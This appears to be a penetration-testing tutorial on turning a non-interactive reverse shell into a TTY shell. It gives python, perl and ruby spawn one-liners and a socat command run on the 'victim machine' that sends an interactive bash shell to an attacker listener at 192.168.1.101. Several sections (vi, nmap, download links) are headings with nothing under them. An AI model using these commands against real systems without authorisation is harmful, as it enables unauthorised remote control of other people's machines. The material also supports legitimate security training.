Spawning a TTY Shell
How to get an interactive shell or TTY shell
During penetration testing, for example, if you found a vulnerable web application and were able to get a reverse shell back to your machine. Usually, the shell that you receive is own by the user of the running service such as “www-data” or something similar. This kind of users is not meant to have a shell because they don’t need to interact with the operating system as humans do.
There are some commands (such as less, vi, su, sudo, passwd .. etc.) that don’t work with non-tty-shell and non-interactive shell. For that reason, you need to upgrade your shell and get a tty-shell.
To check if the shell is a tty shell, just enter tty command like the following.
$ tty not a tty
$ tty /dev/pts/0
Here are some commands which will enable you to spawn a tty shell:
This is the most popular method for spawning a tty shell. The target server should have python or python3 installed.
python -c "import pty;pty.spawn('/bin/bash')"
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
From within vi:
From within nmap:
Socat is like netcat on steroids and is a very powerful networking swiss-army knife. Socat utility can be used to transfer full TTY’s over TCP connections.
Note: Socat is not installed by default. So, you can try to compile the binary itself or download a socat binary from the following links:
On your machine (the attacker machine), start Socat listener:
socat -,raw,echo=0 tcp-listen:4444
On the victim machine, type the following:
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:192.168.1.101:4444